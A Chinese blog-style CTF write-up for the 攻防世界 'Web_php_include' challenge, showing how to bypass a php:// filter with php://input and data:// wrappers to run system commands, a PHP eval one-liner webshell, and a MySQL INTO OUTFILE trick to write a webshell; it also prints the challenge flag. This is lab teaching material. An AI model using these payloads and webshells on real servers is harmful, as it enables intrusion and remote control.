攻防世界Web_php_include

提示:如有问题可联系我,本人24小时在线!


前言

提示:攻防世界Web_php_include

一、题目

在这里插入图片描述
没有提示,那就看题目
在这里插入图片描述

二、解决方法

1.什么意思?

解读一下
程序过滤掉了page=参数传入php://

怎么绕过过滤呢?

方法1 大小写绕过:php://input 伪协议

使用hackbar和burpsuit抓包。post传参
hackbar抓包
post传参,我试了一下不太行。
在这里插入图片描述
于是用burpsuit传参。

page=<?php system('ls'); ?>   #列出所有文件

在这里插入图片描述

page=<?php system('cat fl4gisisish3r3.php'); ?>	#打开flag文件

得到答案:

在这里插入图片描述
$flag=" ctf{876a5fca-96c6-4cbd-9075-46f0c89475d2}";

方法2 使用data://伪协议

data://伪协议可以执行php代码,格式如下:

data://text/plain,要执行的代码

如果特殊字符被过滤,还可以使用base64编码

?page=data://text/plain;base64,编码后的代码

看看

http://61.147.171.105:56947/?page=data://text/plain,<?php system('ls'); ?>

在这里插入图片描述

?page=data://text/plain,page=<?php system('cat fl4gisisish3r3.php'); ?>

在这里插入图片描述

亦或
写一句话木马![

<?php @eval($_POST['123']); ?>

在这里插入图片描述

方法3 建议学习,我自己找出来的方法

习惯性用御剑看看后台目录
在这里插入图片描述
感觉有点东西啊
打开phpinfo.php看看,没啥
再打开phpmyadmin看看
在这里插入图片描述
???厉害不,登录页面。
进去看看就可以了,没找到数据。虚惊一场。

有兴趣可以自己试试

数据库执行这条命令查看secure_file_priv是否为空,为空则可以写数据 如果是null不能写

SHOW VARIABLES LIKE “secure_file_priv”

linux默认tmp是可写目录 试试写入一句话马 菜刀连接

SELECT “<?php eval(@$_POST['xiaohua']); ?>”
INTO OUTFILE ‘/tmp/test1.php’

结束
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值